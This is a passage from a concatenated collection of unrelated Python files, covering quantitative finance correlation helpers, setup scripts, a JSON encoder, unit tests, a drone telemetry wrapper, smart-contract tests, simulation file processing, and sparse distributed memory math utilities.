                            2016-01-08   -0.062465
    :type pred: pd.Series
    :param lag: number of (dense) dates to shift by
    :return: pd.Series of correlations indexed by date (first `lag` entries are NaN)
    """
    if isinstance(pred, pd.DataFrame):
        # BUG FIX: warn with an f-string (the braces used to be printed literally),
        # and log *before* pred is replaced by its first column — afterwards
        # `pred.columns` no longer exists.
        get_module_logger("pred_autocorr").warning(f"Only the first column in {pred.columns} of `pred` is kept")
        pred = pred.iloc[:, 0]
    pred_ustk = pred.sort_index().unstack(inst_col)
    corr_s = {}
    # compare each date's cross-section with the one `lag` rows earlier
    for (idx, cur), (_, prev) in zip(pred_ustk.iterrows(), pred_ustk.shift(lag).iterrows()):
        corr_s[idx] = cur.corr(prev)
    corr_s = pd.Series(corr_s).sort_index()
    return corr_s
def pred_autocorr_all(pred_dict, n_jobs=-1, **kwargs):
    """
    calculate auto correlation for pred_dict

    Parameters
    ----------
    pred_dict : dict
        A dict like {<method_name>: <prediction>}
    kwargs :
        all these arguments will be passed into pred_autocorr
    """
    delayed_tasks = {name: delayed(pred_autocorr)(series, **kwargs) for name, series in pred_dict.items()}
    return complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), delayed_tasks)
def calc_ic(pred: pd.Series, label: pd.Series, date_col="datetime", dropna=False) -> Tuple[pd.Series, pd.Series]:
    """calc_ic.

    Per-date Pearson (IC) and Spearman (rank IC) correlation between predictions
    and labels.

    Parameters
    ----------
    pred :
        predictions, MultiIndex (datetime, instrument)
    label :
        labels aligned with `pred`
    date_col :
        name of the date index level to group by
    dropna :
        drop dates where the correlation is undefined

    Returns
    -------
    Tuple[pd.Series, pd.Series]
        ic and rank ic
    """
    # NOTE: the return annotation used to be the tuple literal (pd.Series, pd.Series),
    # which is not a valid type hint; Tuple[...] matches the sibling functions.
    df = pd.DataFrame({"pred": pred, "label": label})
    ic = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"]))
    ric = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"], method="spearman"))
    if dropna:
        return ic.dropna(), ric.dropna()
    else:
        return ic, ric
def calc_all_ic(pred_dict_all, label, date_col="datetime", dropna=False, n_jobs=-1):
    """calc_all_ic.

    Parameters
    ----------
    pred_dict_all :
        A dict like {<method_name>: <prediction>}
    label:
        A pd.Series of label values

    Returns
    -------
    A dict like {<method_name>: {'ic': <ic series>, 'ric': <rank ic series>}},
    where each series is indexed by date, e.g.

        {'Q2+IND_z': {'ic':
                          2016-01-04   -0.057407
                          ...
                          2020-05-29    0.171393
                      'ric':
                          2016-01-04   -0.040888
                          ...
                          2020-05-29    0.183886}
         ...}
    """
    delayed_ics = {
        name: DelayedDict(["ic", "ric"], delayed(calc_ic)(series, label, date_col=date_col, dropna=dropna))
        for name, series in pred_dict_all.items()
    }
    return complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), delayed_ics)
| nilq/baby-python | python |
from setuptools import setup, find_packages
from os.path import join, dirname
import sys
# Refuse to run on anything other than Python 3.6+.
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
    print("This script requires Python >= 3.6")
    # sys.exit is always available; the bare exit() builtin is injected by the
    # site module and may be missing (e.g. when running with `python -S`).
    sys.exit(1)

# Read the long description with a context manager so the file handle is closed
# instead of leaking until interpreter shutdown.
with open(join(dirname(__file__), "README.md"), encoding="UTF8") as readme:
    long_description = readme.read()

setup(
    name="vkmix",
    version="1.5",
    author="alekssamos",
    author_email="aleks-samos@yandex.ru",
    url="https://github.com/alekssamos/vkmix/",
    packages=find_packages(),
    include_package_data=True,
    long_description_content_type="text/markdown",
    long_description=long_description,
)
| nilq/baby-python | python |
"""A basic JSON encoder to handle numpy and bytes types
>>> bool_array = np.array([True])
>>> bool_value = bool_array[0]
>>> obj = {'an_array': np.array(['a']), 'an_int64': np.int64(1), 'some_bytes': b'a', 'a_bool': bool_value}
>>> assert dumps(obj)
"""
import base64
import json
from functools import partial
import numpy as np
class OtoJsonEncoder(json.JSONEncoder):
    """JSON encoder that additionally handles numpy arrays/scalars and raw bytes.

    - numpy arrays serialize as (nested) lists
    - numpy integer/floating scalars serialize as floats (historical behavior:
      np.int64 was emitted as a float; broadened to all numpy numeric widths)
    - bytes serialize as base64 text
    - numpy booleans serialize as JSON true/false
    """

    def default(self, obj):
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        if isinstance(obj, (np.integer, np.floating)):
            # np.integer/np.floating cover all widths (int32, float32, ...),
            # not just np.int64 as before.
            return float(obj)
        if isinstance(obj, bytes):
            return base64.b64encode(obj).decode('utf-8')
        if isinstance(obj, np.bool_):
            return bool(obj)
        return json.JSONEncoder.default(self, obj)
# Shared keyword arguments so dump/dumps behave identically: compact separators,
# deterministic key order, NaN/Infinity rejected, and the numpy/bytes-aware encoder.
json_dump_partial_kwargs = {
    'allow_nan': False,
    'indent': None,
    'separators': (',', ':'),
    'sort_keys': True,
    'cls': OtoJsonEncoder,
}
# Drop-in replacements for json.dump/json.dumps with the settings above baked in.
dump = partial(json.dump, **json_dump_partial_kwargs)
dumps = partial(json.dumps, **json_dump_partial_kwargs)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
import codecs
import io
import logging
import os
import re
import shutil
import sys
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import tempfile
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
from py3kwarn2to3 import main
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
PY2_TEST_MODULE = os.path.join(TEST_DATA_DIR, "py2_test_grammar.py")
class TestMain(unittest.TestCase):
    """End-to-end tests for the py3kwarn2to3 command-line entry point."""

    if not hasattr(unittest.TestCase, 'assertNotRegex'):
        # This method was only introduced in 3.2.
        def assertNotRegex(self, text, regexp, msg=None):
            # Backport: fail if `regexp` matches `text`.
            if not hasattr(regexp, 'search'):
                regexp = re.compile(regexp)
            if regexp.search(text):
                self.fail("regexp %s MATCHED text %r" % (regexp.pattern, text))

    def setUp(self):
        self.temp_dir = None # tearDown() will rmtree this directory if set.

    def tearDown(self):
        # Clean up logging configuration down by main.
        del logging.root.handlers[:]
        if self.temp_dir:
            shutil.rmtree(self.temp_dir)

    def run_2to3_capture(self, args, in_capture, out_capture, err_capture):
        """Run main() with stdin/stdout/stderr temporarily replaced by the given streams."""
        save_stdin = sys.stdin
        save_stdout = sys.stdout
        save_stderr = sys.stderr
        sys.stdin = in_capture
        sys.stdout = out_capture
        sys.stderr = err_capture
        try:
            return main.main("py3kwarn2to3.fixes", args)
        finally:
            # always restore the real streams, even if main() raises
            sys.stdin = save_stdin
            sys.stdout = save_stdout
            sys.stderr = save_stderr

    def test_unencodable_diff(self):
        """A diff containing non-ASCII text must warn, not crash, on an ASCII terminal."""
        input_stream = StringIO(u"print 'nothing'\nprint u'über'\n")
        out = io.BytesIO() if sys.version_info[0] > 2 else StringIO()
        out_enc = codecs.getwriter("ascii")(out)
        err = StringIO()
        ret = self.run_2to3_capture(["-"], input_stream, out_enc, err)
        self.assertEqual(ret, 0)
        output = out.getvalue()
        if sys.version_info[0] > 2:
            output = output.decode("ascii")
        self.assertTrue("-print 'nothing'" in output)
        self.assertTrue("WARNING: couldn't encode <stdin>'s diff for "
                        "your terminal" in err.getvalue())

    def setup_test_source_trees(self):
        """Setup a test source tree and output destination tree."""
        self.temp_dir = tempfile.mkdtemp() # tearDown() cleans this up.
        self.py2_src_dir = os.path.join(self.temp_dir, "python2_project")
        self.py3_dest_dir = os.path.join(self.temp_dir, "python3_project")
        os.mkdir(self.py2_src_dir)
        os.mkdir(self.py3_dest_dir)
        # Turn it into a package with a few files.
        self.setup_files = []
        open(os.path.join(self.py2_src_dir, "__init__.py"), "w").close()
        self.setup_files.append("__init__.py")
        shutil.copy(PY2_TEST_MODULE, self.py2_src_dir)
        self.setup_files.append(os.path.basename(PY2_TEST_MODULE))
        self.trivial_py2_file = os.path.join(self.py2_src_dir, "trivial.py")
        self.init_py2_file = os.path.join(self.py2_src_dir, "__init__.py")
        with open(self.trivial_py2_file, "w") as trivial:
            trivial.write("print 'I need a simple conversion.'")
        self.setup_files.append("trivial.py")
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| nilq/baby-python | python |
from django.contrib import admin
from .models import Nurse, NursePatient
class NurseAdmin(admin.ModelAdmin):
    """Admin changelist configuration for Nurse records."""
    model = Nurse
    # show the linked auth user in the changelist
    list_display = ['user', ]
class NursePatientAdmin(admin.ModelAdmin):
    """Admin changelist configuration for nurse-patient assignments."""
    model = NursePatient
    # show both sides of the assignment in the changelist
    list_display = ['nurse', 'patient', ]
# Hook both models into the Django admin with their custom configurations.
admin.site.register(Nurse, NurseAdmin)
admin.site.register(NursePatient, NursePatientAdmin)
# Register your models here.
| nilq/baby-python | python |
class Reactor(object) :
    """Abstract reactor (event loop) interface.

    Implementations multiplex socket readiness events and timers and invoke the
    registered callbacks. Every method here must be overridden by a subclass.
    """
    def addReadCallback( self, sockfd, callback ) :
        # Invoke `callback` whenever `sockfd` becomes readable.
        raise NotImplementedError
    def removeReadCallback( self, sockfd ) :
        raise NotImplementedError
    def addWriteCallback( self, sockfd, callback ) :
        # Invoke `callback` whenever `sockfd` becomes writable.
        raise NotImplementedError
    def removeWriteCallback( self, sockfd ) :
        raise NotImplementedError
    def addExceptionCallback( self, sockfd, callback ) :
        # Invoke `callback` on exceptional socket conditions (e.g. OOB data).
        raise NotImplementedError
    def removeExceptionCallback( self, sockfd ) :
        raise NotImplementedError
    # timeout is seconds in floating point, returns async.Op
    def addTimer( self, timeout, callback=None ) :
        raise NotImplementedError
    # single shot timer, timeout is float, return async.Op
    def callLater( self, timeout, callback=None ) :
        raise NotImplementedError
| nilq/baby-python | python |
from dronekit import *
from pymavlink import mavutil
import argparse
import serial
from random import uniform
class Pixhawk:
    """Service wrapper around a dronekit connection to a Pixhawk flight controller."""

    def __init__(self):
        # "down"/"running" or an error description; used to check whether the
        # service is functioning normally.
        self.status = "down"
        self.vehicle = None
        # 1 while a dronekit vehicle link is up, 0 otherwise. Initialized here so
        # check_status() cannot raise AttributeError before connect() is called.
        self.connection_status = 0

    def start(self):
        """Parse --connect/--baud from the command line and connect to the autopilot."""
        print("starting Pixhawk")
        self.status = "running"
        # this function will at least connect to pixhawk for future telem data retrieval.
        parser = argparse.ArgumentParser()
        parser.add_argument("--connect", default="/dev/serial0")
        parser.add_argument("--baud", default="921600")
        args = parser.parse_args()
        self.connect(args)

    def stop(self):
        """Tear down the vehicle connection and mark the service as down."""
        print("stopping Telemetry Data")
        self.status = "down"
        self.disconnect()

    def check_status(self):
        """Print a human-readable health summary of the Pixhawk link."""
        if self.connection_status:
            print("Status: Active")
            # BUG FIX: was `vehicle.gps_0`, a NameError — the handle lives on self.
            print("GPS connection state: %s" % self.vehicle.gps_0)
        else:
            print("Status: Broken (see above for details)")

    # Connect to the vehicle
    def connect(self, args):
        """Open the dronekit connection described by `args` (.connect / .baud)."""
        print("Connecting to aircraft via: %s" % args.connect)
        try:
            # Honor the parsed --baud argument instead of a hard-coded rate.
            self.vehicle = connect(args.connect, baud=int(args.baud), wait_ready=True)
            self.connection_status = 1
        # Dronekit Error
        except APIException:
            print("The connection has timed out.")
            self.connection_status = 0
            self.status = "pixhawk connection broken"
        # Other error (was a bare except:, which also swallowed KeyboardInterrupt)
        except Exception:
            print("Error connecting to pixhawk via serial.")
            self.connection_status = 0
            self.status = "pixhawk connection broken"

    # Close vehicle connection
    def disconnect(self):
        """Close the dronekit vehicle handle."""
        self.vehicle.close()
        self.connection_status = 0

    def gps_test(self):
        """Soak test for gps/telemetry retrieval. WARNING: this loops forever."""
        import time  # local import: `time` is not imported at module scope

        while True:
            time.sleep(1)

    def getDirection(self):
        # Returns a value between 0-360 depending on the direction the ground
        # vehicle is facing. Placeholder: currently always -1 (not implemented).
        if not self.vehicle:
            return -1
        return -1

    def getLat(self):  # Get vehicle latitude as str, or -1 when not connected
        if not self.vehicle:
            return -1
        return str(self.vehicle.location.global_relative_frame.lat)

    def getLon(self):  # Get vehicle longitude as str, or -1 when not connected
        if not self.vehicle:
            return -1
        return str(self.vehicle.location.global_relative_frame.lon)

    def getAlt(self):  # Get vehicle altitude, or -1 when not connected
        if not self.vehicle:
            return -1
        return self.vehicle.location.global_relative_frame.alt

    def get_location(self):  # Get vehicle position as a {"lat","lon","alt"} dict
        return {"lat": self.getLat(), "lon": self.getLon(), "alt": self.getAlt()}
pixhawk = Pixhawk()
| nilq/baby-python | python |
import brownie
def test_withdraw_all(splitter, alice, bob):
    """Withdrawing as alice pays out her full tracked balance and leaves bob untouched."""
    initial_alice_balance = alice.balance()
    initial_contract_balance = splitter.balance()
    initial_alice_contract_balance = splitter.balances(alice)["balance"]
    initial_bob_balance = bob.balance()
    initial_bob_contract_balance = splitter.balances(bob)["balance"]
    splitter.withdrawAll({"from": alice})
    # alice received exactly her tracked balance (presumably the test chain does not
    # charge gas to the sender's balance here — TODO confirm fixture configuration)
    assert alice.balance() - initial_alice_balance == initial_alice_contract_balance
    # bob's on-chain and in-contract balances are unchanged
    assert initial_bob_balance == bob.balance()
    assert initial_bob_contract_balance == splitter.balances(bob)["balance"]
    # alice's tracked balance is zeroed and the contract shrank by the payout
    assert splitter.balances(alice)["balance"] == 0
    assert (
        splitter.balance() == initial_contract_balance - initial_alice_contract_balance
    )
def test_withdraw_all_zero_amount(splitter, alice):
    """A second withdrawal with nothing left must revert."""
    splitter.withdrawAll({"from": alice})
    with brownie.reverts():
        splitter.withdrawAll({"from": alice})
def test_withdraw_all_not_payee(splitter, david):
    """An address with no stake in the splitter cannot withdraw."""
    with brownie.reverts():
        splitter.withdrawAll({"from": david})
| nilq/baby-python | python |
#econogee, 1/28/2016
#Stock Data Retrieval Script
#If executed via the command line, will produce 500 data files with stock price information
#between the dates specified in the main method. Can also be imported to use the RetrieveStock method.
import os
import sys
import numpy as np
import urllib2
def RetrieveStock(TickerSymbol, start, end):
    """Download daily price history for `TickerSymbol` between `start` and `end`.

    `start`/`end` are (day, month, year) triples; returns a numpy array with one
    CSV line per element (header first).
    """
    startday, startmonth, startyear = (str(s) for s in start)
    endday, endmonth, endyear = (str(s) for s in end)
    url = (
        'http://real-chart.finance.yahoo.com/table.csv?s=' + str(TickerSymbol)
        + '&a=' + startday + '&b=' + startmonth + '&c=' + startyear
        + '&d=' + endday + '&e=' + endmonth + '&f=' + endyear
        + '&g=d&ignore=.csv'
    )
    response = urllib2.urlopen(url)
    lines = response.read().split('\n')
    return np.array(lines)
def main():
    """Fetch histories for every symbol in stocklist.csv and save one file per symbol."""
    start = (str(0), str(1), str(2005))
    end = (str(30), str(1), str(2016))
    with open('stocklist.csv') as f:
        content = f.readlines()
    symbols = [line.split(",")[0] for line in content]
    for sym in symbols:
        rows = RetrieveStock(sym, start, end)
        np.savetxt(str(sym), rows, fmt='%s', delimiter=',')
if __name__ == "__main__": main() | nilq/baby-python | python |
import os
import sys
def pre_process(baseDir, x1, x2, x3):
    """
    An utility function to pre-process the .comm input files by reading it
    and replacing the design variables (Length, Breadth and Thickness) with
    the values provided by BOA.

    PARAMS:
        baseDir - The path of the directory which holds the required input files
        x1 - Length  (written to the LONG line)
        x2 - Thickness (written to the EP line)
        x3 - Breadth (written to the LARG line)
    RETURNS:
        The name of the .export file in baseDir, which is required for simulation.
    RAISES:
        FileNotFoundError when any of the .comm/.export/.mmed files is missing.
    """
    cnt = 0
    comm_file = None
    export_file = None
    # Locate the required input files present in baseDir.
    for file in os.listdir(baseDir):
        if file.endswith(".comm"):
            cnt += 1
            comm_file = os.path.join(baseDir, file)
        elif file.endswith(".export"):
            cnt += 1
            export_file = file
        elif file.endswith(".mmed"):
            cnt += 1
    # Check whether the base directory has all required input files.
    if cnt < 3:
        # BUG FIX: the original followed this raise with an unreachable sys.exit().
        raise FileNotFoundError("One or all required input files are missing "
                                "in the directory")
    # Rewrite the design-variable lines in place. A context manager guarantees the
    # handle is closed even if the rewrite fails.
    with open(comm_file, 'r+') as fhc:
        data = fhc.readlines()
        # EP - thickness, LONG - length, LARG - breadth; only the first matching
        # line of each kind is updated.
        for i, v in enumerate(data):
            if 'EP' in v:
                data[i] = v.split('=')[0] + '= ' + str(x2) + '\n'
                break
        for i, v in enumerate(data):
            if 'LONG' in v:
                data[i] = v.split('=')[0] + '= ' + str(x1) + '\n'
                break
        for i, v in enumerate(data):
            if 'LARG' in v:
                data[i] = v.split('=')[0] + '= ' + str(x3) + '\n'
                break
        fhc.seek(0)
        fhc.truncate()
        fhc.writelines(data)
    return export_file
def post_process(baseDir):
    """
    An utility function to post-process the .resu result file to get
    the desired displacement value from file
    PARAMS:
        baseDir - The path of the directory which holds the output .resu file
    RETURNS:
        This function returns the displacement value for that epoch
    """
    # Getting the path of the output file created in the baseDir post simulation
    # (if several .resu files exist, the last one found wins)
    for file in os.listdir(baseDir):
        if file.endswith(".resu"):
            resu_file = os.path.join(baseDir, file)
    # Opening the .resu file to post-process the result to get the required
    # Displacement variable value
    fhc = open(resu_file, 'r')
    data = fhc.readlines()
    fhc.close()
    # Post processing the result
    # NOTE(review): hard-coded line 199 / last whitespace-separated token assumes a
    # fixed Code_Aster .resu layout — confirm if the solver version changes.
    y = data[198].split()[-1]
    # Delete the result file
    os.remove(resu_file)
    return float(y)
| nilq/baby-python | python |
#! /usr/bin/env python3.8
from larning.setup import (
get_version,
get_github_url,
PACKAGE_NAME,
PACKAGES,
setup,
LONG_DESCRIPTION,
require_interpreter_version,
)
# ˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇ
# Refuse to run on interpreters older than Python 3.8.0.
require_interpreter_version(3, 8, 0)
version = get_version(0, 0, 0)
INSTALL_REQUIRES = []  # no runtime dependencies
AUTHOR = "Tasnádi Gábor"
EMAIL = "tasi.gabi97@gmail.com"
URL = get_github_url("tasigabi97")
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
setup(
    name=PACKAGE_NAME,
    version=version,
    author=AUTHOR,
    author_email=EMAIL,
    description=PACKAGE_NAME,
    long_description=LONG_DESCRIPTION,
    long_description_content_type="text/markdown",
    url=URL,
    packages=PACKAGES,
    include_package_data=True,
    classifiers=[
        "Programming Language :: Python :: 3",
        "Development Status :: 3 - Alpha",
        "Intended Audience :: Education",
        "Intended Audience :: Science/Research",
    ],
    install_requires=INSTALL_REQUIRES,
    keywords=[
        PACKAGE_NAME,
    ],
    license="MIT",
)
| nilq/baby-python | python |
import torch.nn as nn
import torch
import math
class AffinityLayer(nn.Module):
    """
    Affinity layer computing pairwise affinities in feature space:
        M = X @ ((A + A^T) / 2) @ Y^T
    where A is a learned (dim x dim) weight matrix, symmetrized in the forward pass.

    Input: batched features X [b, n1, dim] and Y [b, n2, dim]
    Output: affinity matrix M [b, n1, n2]
    """

    def __init__(self, dim):
        super(AffinityLayer, self).__init__()
        self.dim = dim
        self.A = nn.Parameter(torch.Tensor(self.dim, self.dim))
        self.reset_parameters()

    def reset_parameters(self):
        """Uniform(-1/sqrt(dim), 1/sqrt(dim)) initialization plus the identity."""
        bound = 1. / math.sqrt(self.dim)
        self.A.data.uniform_(-bound, bound)
        self.A.data += torch.eye(self.dim)

    def forward(self, X, Y):
        assert X.shape[2] == Y.shape[2] == self.dim
        symmetric_A = (self.A + self.A.transpose(0, 1)) / 2
        affinity = torch.matmul(X, symmetric_A)
        return torch.matmul(affinity, Y.transpose(1, 2))
| nilq/baby-python | python |
import numpy as np
def sigmoid(x):
    """Element-wise logistic function 1 / (1 + e^-x)."""
    neg_exp = np.exp(-x)
    return 1 / (1 + neg_exp)
def softmax(x):
    """Numerically stable softmax over all elements of x.

    Subtracting max(x) before exponentiating prevents overflow for large inputs
    (the original overflowed to nan for inputs around 1000); the result is
    mathematically unchanged because the shift cancels in the ratio.
    """
    shifted_exp = np.exp(x - np.max(x))
    return shifted_exp / np.sum(shifted_exp)
def relu(x):
    """Element-wise rectifier max(x, 0), preserving the input dtype."""
    floor = np.zeros_like(x)
    return np.maximum(x, floor)
| nilq/baby-python | python |
"""
Author: Trenton Bricken @trentbrick
All functions in this script are used to generate and approximate the circle intersection
in binary and continuous space and also convert between cosine similarity and hamming distance.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import binom, norm
from scipy.sparse import csc_matrix, coo_matrix, csr_matrix
import pandas as pd
import scipy
from scipy.integrate import quad
import time
from scipy.special import comb
import torch
import torch.optim as optim
import torch.nn.functional as F
def softmax(x, beta):
    """Temperature-scaled softmax over every element of a vector."""
    assert len(x.shape) <3, 'this softmax can currently only handle vectors'
    scaled_exp = np.exp(beta * x)
    return scaled_exp / scaled_exp.sum()
def check_cosine_and_hamm_bounds(cosines, hamms, n):
    """
    Validate that cosine similarities lie in [-1, 1] and Hamming distances in [0, n],
    guarding the conversions between the two representations against numerical errors.
    """
    if not torch.is_tensor(cosines):
        cosines, hamms = np.asarray(cosines), np.asarray(hamms)
    hamm_ok = not ((hamms < 0).any() or (hamms > n).any())
    assert hamm_ok, "Hamm is out of bounds!"
    cosine_ok = not ((cosines > 1).any() or (cosines < -1).any())
    assert cosine_ok, "Cosine is out of bounds!"
def cosine_to_hamm(cosines, n):
    """Map cosine similarities in [-1, 1] to integer Hamming distances in [0, n]."""
    if torch.is_tensor(cosines):
        # clamp cosines exceeding 1.0 by a tiny epsilon (numerical instability)
        noisy = torch.logical_and(cosines > 1, cosines < 1 + 1e-4)
        cosines[noisy] -= 1e-4
    hamms = n * (1 - cosines) / 2
    hamms = torch.floor(hamms) if torch.is_tensor(cosines) else np.floor(hamms)
    check_cosine_and_hamm_bounds(cosines, hamms, n)
    return hamms
def hamm_to_cosine(hamms, n):
    """Inverse of cosine_to_hamm: cosine = 1 - 2*d/n, validated to stay in bounds."""
    cosines = 1 - (hamms * 2 / n)
    check_cosine_and_hamm_bounds(cosines, hamms, n)
    return cosines
def torch_hamm_dist(A, B):
    """
    Pairwise Hamming distances between the COLUMNS of A and B (patterns are
    stored as column vectors, so argument order matters: entry [i, j] of the
    result compares column i of A with column j of B... transposed back so
    columns of the output correspond to A's patterns).
    """
    assert len(A.shape) == len(B.shape), "Need for A and B to be the same shape."
    a_patterns = A.T.type(torch.float)
    b_patterns = B.T.type(torch.float)
    return torch.cdist(a_patterns, b_patterns, p=0).type(torch.int).T
### FUNCTIONS APPROXIMATING A KNOWN AND PROVIDED CIRCLE INTERSECTION:
def get_binary_and_continuous_caches(n, hamm_radius, r, cont_cache_resolution):
    """
    Getting both the binary and continuous circle intersection results and caching them
    to make the SDM experiments run much more efficiently.

    n -- dimension of the space; hamm_radius -- Hamming radius of each circle;
    r -- number of neurons; cont_cache_resolution -- number of cosine grid points.
    Returns (binary intersections for every Hamming distance 0..n,
             log continuous intersections on an evenly spaced cosine grid).
    """
    all_dvs = np.arange(0,n+1)
    cached_intersects = expected_intersection_lune(n, all_dvs, hamm_radius, r)
    cs_intervals = np.linspace(-1,1,cont_cache_resolution).astype(float)
    # nudge the last grid point just below 1.0 so arccos/tan stay finite
    cs_intervals[-1] = cs_intervals[-1] - 1e-15
    log_continuous_cached_intersects = cap_intersection(n, cs_intervals, hamm_radius, r,
                                                        return_log=True,
                                                        ham_input=False, print_oobs=False)
    return cached_intersects, log_continuous_cached_intersects
def fit_beta_regression(n, xvals, res, return_bias=False, ham_input=True):
    """Fit beta (and optionally bias) of res ~ exp(beta * x + bias) by log-linear OLS.

    n -- space dimension (used to convert Hamming inputs to cosines)
    xvals -- Hamming distances (ham_input=True) or cosine similarities
    res -- circle-intersection sizes to fit; zero entries are dropped (log undefined)
    """
    xvals = np.asarray(xvals)
    res = np.asarray(res)
    if ham_input:
        xvals = hamm_to_cosine(xvals, n)
    # BUG FIX: the original only tested res[-1] for zero, so a zero anywhere else
    # silently produced -inf in the log below. Drop every zero entry.
    zero_mask = res == 0.0
    if zero_mask.any():
        print("res equals 0, problem for the log. Removing from the equation here.")
        res = res[~zero_mask]
        xvals = xvals[~zero_mask]
    yvals = np.log(res)
    # log linear regression closed form solution.
    # BUG FIX: np.cov defaults to ddof=1 while np.var defaults to ddof=0, which
    # inflated beta by N/(N-1); use ddof=1 in both for the exact OLS slope.
    beta = np.cov(xvals, yvals)[0][1] / np.var(xvals, ddof=1)
    bias = np.mean(yvals) - beta * np.mean(xvals)
    if return_bias:
        return beta, bias
    else:
        return beta
def fit_softmax_backprop(n, dvals, targets, lr=0.3, niters=5000, ham_input=False, plot_losses=True):
    """
    Learn a softmax temperature beta such that softmax(beta * x) matches `targets`,
    by gradient descent on the mean squared error. Note this fits the normalized
    softmax directly (conditioned on the given inputs) rather than the raw
    exponential approximation, which is interesting for analyzing what a perfect
    Beta fit to a particular softmax would be.

    n -- space dimension (for Hamming-to-cosine conversion when ham_input=True)
    dvals -- Hamming distances (ham_input=True) or cosine similarities
    targets -- unnormalized target weights; normalized internally
    Returns the fitted beta as a Python float.
    """
    targets = torch.Tensor(targets / sum(targets))
    if ham_input:
        xvals = torch.Tensor(hamm_to_cosine(dvals, n))
    else:
        xvals = torch.Tensor(dvals)
    # beta is initialized uniformly at random in [1, 30) and optimized directly
    beta = torch.nn.Parameter(torch.Tensor(np.random.uniform(1, 30, 1)), requires_grad=True)
    optimizer = optim.Adam([beta], lr=lr)
    losses = []
    for i in range(niters):
        # training loop:
        optimizer.zero_grad()  # zero the gradient buffers
        # BUG FIX: pass dim=0 explicitly — xvals is 1-D, and implicit-dim softmax
        # is deprecated (same result, no warning).
        preds = F.softmax(beta * xvals, dim=0)
        loss = ((targets - preds) ** 2).sum() / len(dvals)
        loss.backward()
        optimizer.step()
        losses.append(loss.item())
    if plot_losses:
        plt.figure()
        plt.plot(losses)
        plt.title("Losses during learning")
        plt.show()
    print("final loss", loss.item())
    return beta.item()
def integral_func(phi, th1, n):
    """Integrand of the J_n cap-intersection integral: sin^(n-2)(phi) weighted by a
    regularized incomplete beta function of the squared tangent ratio."""
    beta_arg = 1 - ((np.tan(th1)) / (np.tan(phi))) ** 2
    return np.sin(phi) ** (n - 2) * scipy.special.betainc((n - 2) / 2, 1 / 2, beta_arg)
def log_J_n(th1, th2, r, n):
    """Log of the J_n hypersphere-cap intersection integral for angles [th1, th2],
    radius r and dimension n: log( pi^((n-1)/2) / Gamma((n-1)/2) * r^(n-1) * I )."""
    integral = quad(integral_func, th1, th2, args=(th1, n) )[0]
    #print(np.log(np.pi**( (n-1) /2) ) , scipy.special.loggamma( (n-1) /2), np.log(r**(n-1)), np.log(integral ))
    return np.log(np.pi**( (n-1) /2) ) - scipy.special.loggamma( (n-1) /2) + np.log(r**(n-1)) + np.log(integral )
def cap_intersection(n, cs_dvs, hamm_radius, r, rad=1,
                     return_log=False, ham_input=False, print_oobs=False):
    """
    Computes the continuous hypersphere cap intersection.
    Does all compute in log space for numerical stability, option to return
    log results or not.

    n -- space dimension; cs_dvs -- cosine similarities between circle centers
    (Hamming distances when ham_input=True); hamm_radius -- Hamming radius of
    each circle; r -- number of neurons (None means a very large number);
    rad -- hypersphere radius. Out-of-bounds pairs yield NaN (or 0 / -1e30).
    """
    # size of total space (log surface area of the n-sphere)
    log_total_space = log_hypersphere_sa(n, rad)
    if r is not None:
        if type(r) != int:
            r = np.round(r)  # number of neurons
        r = float(r)
        log_perc_addresses_w_neurons = np.log(r) - log_total_space
    else:
        log_perc_addresses_w_neurons = np.log(1e40)  # a very large number of neurons
    if ham_input:
        # BUG FIX: hamm_to_cosine requires the dimension n; it was called with a
        # single argument, which raised a TypeError whenever ham_input=True.
        cs_dvs = hamm_to_cosine(cs_dvs, n)
    c_dist = hamm_to_cosine(hamm_radius, n)
    t1 = t2 = np.arccos(c_dist)
    log_inters = []
    for cs_dv in cs_dvs:
        tv = np.arccos(cs_dv)
        if tv >= t1 + t2 or t1 + t2 > (2 * np.pi) - tv:
            if print_oobs:
                print("out of equation bounds", cs_dv)
            log_inters.append(np.nan)
            continue
        tmin = np.arctan((np.cos(t1) / (np.cos(t2) * np.sin(tv))) - (1 / np.tan(tv)))
        assert np.round(tmin, 5) == np.round(tv - tmin, 5)
        assert np.round(t2, 5) == np.round(t1, 5)
        log_inters.append(2 + log_J_n(tmin, t2, rad, n))
    log_inters = np.asarray(log_inters)
    log_num_expected_neurons = log_inters + log_perc_addresses_w_neurons
    if return_log:
        # NaNs (out-of-bounds pairs) become a very large negative log value
        log_num_expected_neurons = np.nan_to_num(log_num_expected_neurons, nan=-1e+30)
        return log_num_expected_neurons
    else:
        num_expected_neurons = np.exp(log_num_expected_neurons)
        num_expected_neurons = np.nan_to_num(num_expected_neurons, nan=0.0)
        return num_expected_neurons
def log_hypersphere_sa(n, rad=1):
    """Log surface area of the (n-1)-sphere of radius `rad` embedded in R^n.

    SA = 2 * pi^(n/2) / Gamma(n/2) * rad^(n-1)  (L2 norm, see
    https://en.wikipedia.org/wiki/Unit_sphere), accumulated term-by-term in
    log space: the original np.log(np.pi**(n/2)) and np.log(rad**(n-1))
    overflow to inf for large n/rad before the log is applied.
    """
    return np.log(2.0) + (n / 2) * np.log(np.pi) - scipy.special.loggamma(n / 2) + (n - 1) * np.log(rad)
def hypersphere_v(n, r):
    """
    Volume of an n-dimensional ball of radius r. Not used but implemented.

